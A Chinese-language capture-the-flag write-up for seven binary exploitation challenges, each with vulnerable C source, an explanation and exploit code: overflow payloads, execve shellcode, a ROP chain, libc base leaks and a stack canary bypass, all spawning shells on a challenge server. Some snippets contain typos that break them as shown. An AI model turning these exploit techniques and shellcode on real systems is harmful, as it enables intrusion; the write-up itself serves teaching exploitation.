第一題:BOF easy [ pwn ]#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
#include <stdio.h>
void l33t() {
puts("Congrat !!Congrat");
system("/bin/sh");
}
int main() {
char buf[20];
puts("Buffer overerflow is easy");
printf("Read your input :");
fflush(stdout);
read(fflush0,buf,100);
return 0 ;
}
|
解題思路#
l33t()中有system("/bin/sh"),所以目標就是執行l33t()
由code可知buf長度20,但read()讀100個bytes,代表這裡可以buffer overflow
並且這題沒有ASLR,所以用objdump可以找出l33t()的address為0x80484fd
接著,只需要將main()的return address蓋成0x80484fd即可
payload:
1
|
(perl -e 'print "A"x32, "\xfd\x84\x04\x08"';cat) | nc 140.115.53.13 11001
|
第二題:BSS overflow [pwn]#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
#include <stdio.h>
char name[200];
char *filename;
int main(){
FILE *fp ;
char buf[2704];
puts("What's your name ?");
fflush(stdout);
filename = "/home/bssof/welcome";
gets(name);
fp = fopen(filename,"r");
if(!fp){
puts("Error !!");
return -1;
}else{
fread(buf,2704,1,fp);
}
printf("%s\n",buf);
printf("Goodbye ~ %s\n",name);
fflush(stdout);
return 0 ;
}
|
解題思路#
這題因為使用gets(),明顯地,name可以buffer overflow
而name和filename都在BSS段,我們可以知道name往下蓋會蓋到filename
所以這題如果先把flag的位置寫到name中,再往下把filename蓋成指向name的位置
這樣fopen就會幫我們把flag的內容讀出來!
payload:
1
|
perl -e 'print "/home/bssof/flag","\x00"x184,"\x60\xa0\x04\x08"' | nc 140.115.53.13 11000
|
第三題:Shellcode Injection [pwn]#
1
2
3
4
5
6
7
8
9
10
11
12
13
|
#include <stdio.h>
int main(){
char buf[100];
printf("The buffer of your input %p\n",buf);
puts("Can you pwn it ?");
printf("Your input : ");
fflush(stdout);
gets(buf);
puts("Goodbye ~");
fflush(stdout);
}
|
解題思路#
這題一樣gets()會導致buffer overflow發生
然後這題沒有DEP保護,所以可以寫shellcode進buf來執行
但是這題有ASLR,所以code開頭很好心的把buf位置印出來
payload:
1
2
3
4
5
6
7
8
|
from pwn import *
r = remote('140.115.53.13', 11002)
r.recvuntil('The buffer of your input ')
addr = r.recvline() # get the address of buffer
print addr
# execv('bin/sh') 25 bytes
r.send("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*87 + p32(int(addr,16)) + "\n")
r.interactive()
|
第四題:ROP beginner [pwn]#
1
2
3
4
5
6
7
8
9
10
|
#include <stdio.h>
int main(){
char buf[20];
puts("ROP is easy is'nt it ?");
printf("Your input :");
fflush(stdout);
read(0,buf,300);
}
|
解題思路#
看這題code那麼短,加上題目提到ROP,所以猜測這題執行檔是用靜態編譯
應該有夠多ROP gadget可以組shell
直接拿ROPgadget組ROP chain
1
|
ROPgadget --binary rop_beginner --ropchain
|
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
#!/usr/bin/envpython2
#execve generated by ROPgadget
#ROPgadget --binary rop_beginner --ropchain
from struct import pack
#Padding goes here
p=''
p+='a'*32
p+=pack('<I',0x0806e82a)
p+=pack('<I',0x080ea060)
p+=pack('<I',0x080bae06)
p+='/bin'
p+=pack('<I',0x0809a15d)
p+=pack('<I',0x0806e82a)
p+=pack('<I',0x080ea064)
p+=pack('<I',0x080bae06)
p+='//sh'
p+=pack('<I',0x0809a15d)
p+=pack('<I',0x0806e82a)
p+=pack('<I',0x080ea068)
p+=pack('<I',0x08054250)
p+=pack('<I',0x0809a15d)
p+=pack('<I',0x080481c9)
p+=pack('<I',0x080ea060)
p+=pack('<I',0x0806e851)
p+=pack('<I',0x080ea068)
p+=pack('<I',0x080ea060)
p+=pack('<I',0x0806e82a)
p+=pack('<I',0x080ea068)
p+=pack('<I',0x08054250)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x0807b27f)
p+=pack('<I',0x080493e1)
print p
|
第五題:Return to library [pwn]#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
#include <stdio.h>
void See_something(unsigned int addr){
int *address ;
address = (int *)addr ;
printf("The content of the address : %p\n",*address);
};
void Print_message(char *mesg){
char buf[48];
strcpy(buf,mesg);
printf("Your message is : %s",buf);
}
int main(){
char address[10] ;
char message[256];
unsigned int addr ;
puts("###############################");
puts("Do you know return to library ?");
puts("###############################");
puts("What do you want to see in memory?");
printf("Give me an address (in dec) :");
fflush(stdout);
read(0,address,10);
addr = strtol(address);
See_something(addr) ;
printf("Leave some message for me :");
fflush(stdout);
read(0,message,256);
Print_message(message);
puts("Thanks you ~");
return 0 ;
}
|
解題思路#
這題有DEP保護
一開始先找出puts的got位址,因為程式一開始可以讓我們讀某個 address的內容,我們就塞這個got給他,讓他讀puts真正位址
根據 base + offset = address,我們把得到的位址減掉offset就能找出 base address,再⽤base + system offset就能得到system的位址 如此一來就能控制return address跳到system,並且system的參數(/bin/sh)位址也能從libc.so取得(⼀樣是offset + base)
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
from pwn import *
puts_got = 0x804a01c
puts_off = 0x64c10
gets_off = 0x642b0
system_off = 0x3fcd0
sh_off = 0x15da84
r = remote('140.115.53.13', 11004)
r.send("134520860" + "\n")
r.recvuntil('The content of the address : ')
puts_addr = r.recvline()
base = int(puts_addr,16) - puts_off
gets_addr = base + gets_off
system_addr = base + system_off
r.send("A"*60 + p32(system_addr) + "A"*4 + p32(sh_off + base) + "\n")
r.interactive()
|
第六題:Simple echo [pwn]#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
#include <stdio.h>
int main() {
char buf[128];
setvbuf(stdout,0,2,0);
puts("####################");
puts(" Simple echo server");
puts("####################");
puts("Enter exit to quit ");
while(1){
memset(buf,0,128);
printf("Input : ");
read(0,buf,256);
buf[136] = '\x00';
usleep(400000);
if(!memcmp(buf,"exit",4)){
break ;
}
puts("");
printf("echo %s",buf);
}
puts("goodbye~");
}
|
解題思路#
首先,這題有開StackGuard,所以單純buffer overflow會被偵測,必須想辦法先知道canary的值,然後去做buffer overflow就能避開canary修改偵測(還原canary)
具體實現是先塞128字元的垃圾進去,他會把\x00前的東⻄印出來,包括buf[136]前的東西,也就是canary!
所以我們就有辦法控制 return address而不被StackGuard偵測,再來因為有DEP,我們一樣要用到PLT/GOT,先想辦法leak GOT裡面的某個函數位址 (這裏我leak puts()),然後算出base address,就能像上題那樣直接call system(“/bin/sh”)。要leak puts的GOT內容,可以把main return address蓋成puts的PLT,然後參數放GOT位址去leak memory 內容。
整個stack分佈大概是⻑這樣:
padding + canary + padding + puts@plt + main_address + puts@got
這樣就可以用 base + offset = address來求base
要再call main的原因是因為我leak出來之後還要再接著call system,所以就讓程式再跑⼀次,重新做⼀次overflow,把return address蓋成system()位址
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
from pwn import *
r = remote('140.115.53.13', 11005)
r.recvuntil("Input :")
r.send("A"*128 + "\n")
a = r.recvuntil("Input :")
puts_plt = 0x08048470
puts_got = 0x804a020
main = 0x080485bd
gets_off = 0x642b0
puts_off = 0x64c10
system_off = 0x3fcd0
sh_off = 0x15da84
r.send("exit" + "A"*124 + "\x00" + a[136:139] + "A"*12 + p32(puts_plt) + p32(main) + p32(puts_got) + "\n")
print r.recvline()
tmp = r.recvline()
print enhex(tmp)
base = u32(tmp[0:4]) - puts_off
print "Base = ", hex(base)
gets = base + gets_off
system = base + system_off
print "main = ", hex(main)
print "system = ", hex(system)
r.send("exit" + "A"*124 + "\x00" + a[136:139] + "A"*5 + "\x85\x04\x08" + p32(system) + p32(puts_got) + p32(sh_off+base) + "\n")
r.interactive()
|
第七題:Bubble sort [pwn]#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
|
#include <stdio.h>
int main(){
unsigned int n,i,j ;
unsigned int tmp ;
unsigned int buf[8];
while(1){
puts("How many numbers do you have ?");
fflush(stdout);
scanf("%u",&n);
for(i = 0 ; i < n ; i++){
printf("Enter the %d number : ",i);
fflush(stdout);
scanf("%u",&buf[i]);
}
puts("Processing......");
fflush(stdout);
sleep(1);
for(i = n ; i > 0 ; i--){
for( j = 0 ; j < i ; j++){
if(buf[j] > buf[j+1]){
tmp = buf[j] ;
buf[j] = buf[j+1];
buf[j+1] = tmp ;
}
}
}
puts("Result :");
fflush(stdout);
for(i = 0 ; i < n ; i++){
printf("%u ",buf[i]);
}
puts("");
puts("Continue (yes:1,no:0) ?");
fflush(stdout);
scanf("%u",&tmp);
if(tmp != 1){
puts("Thank you ~");
fflush(stdout);
break ;
}
}
return 0 ;
}
|
解題思路#
首先,這題有DEP、StackGuard
這題看似單純的bubble sort,實際上交換的部分有bug
他有可能拿buf以外的值來做判斷、交換
所以只要塞小一點的值,就可以把後面想leak的memory內容排序到前面
然後我們要做的就是去Leak canary和main return address
⽤gdb動態分析⼀下就能找出canary和main return address的位址在stack中的位置,再來就是構造出能夠讓canary和return address被排到前面的序列,首先我們需要夠⼤的數字(要⼤於我們想leak的內容),這裏我是塞-1
第一輪先塞8個-1,則canary值會因為⼩於-1(約4294967295),排序到最前面,故可取得canary值
第二輪塞16個9999999900,return address因為⼩於9999999900,被排序到最前面
第三輪塞20個9999999999 防止排序搗亂我們
第四輪塞17個0,再塞2個/bin/sh位址 (其實只需塞最後一個即可,但為了防止排序搗亂所以塞兩個)
最後一輪塞8個0、3個canary、6個system位址,即可拿到shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
|
from pwn import *
remote r = remote('140.115.53.13', 31337)
# STEP 1
r.send("8\n" + "-1\n"*8)
r.recvline()
r.recvline()
r.recvline()
str = r.recvline()
canary = (str[:10])
print "*"*10
print "canary = ", canary
print "*"*10
r.send("1\n")
# STEP 2
r.recvuntil('How many numbers do you have ?')
r.send("16\n" + "9999999900\n" * 16)
r.recvline()
r.recvline()
r.recvline()
str = r.recvline()
ret = str[:10]
print "*"*10
print "ret = ", ret
print "*"*10
r.send("1\n")
# STEP 3
r.recvuntil('How many numbers do you have ?')
r.send("20\n" + "9999999999\n" * 20)
r.recvline()
r.recvline()
r.recvline()
str = r.recvline()
r.send("1\n")
# Address
base = int(ret) - 0x19a63
sh = (base + 0x15da84).__str__()
system = (base + 0x3fcd0).__str__()
print "base = ", base
print "sh = ", sh
print "systen = ", system
# STEP 4
r.recvuntil('How many numbers do you have ?')
r.send("19\n" + "0\n" * 17 + (sh + "\n") * 2)
r.recvline()
r.recvline()
r.recvline()
str = r.recvline()
r.send("1\n")
# STEP 5
r.recvuntil('How many numbers do you have ?')
r.send("17\n" + "0\n" * 8 + (canary + "\n") * 3 + (system + "\n") * 6)
r.recvline()
r.recvline()
r.recvline()
str = r.recvline()
r.send("0\n")
r.interactive()
|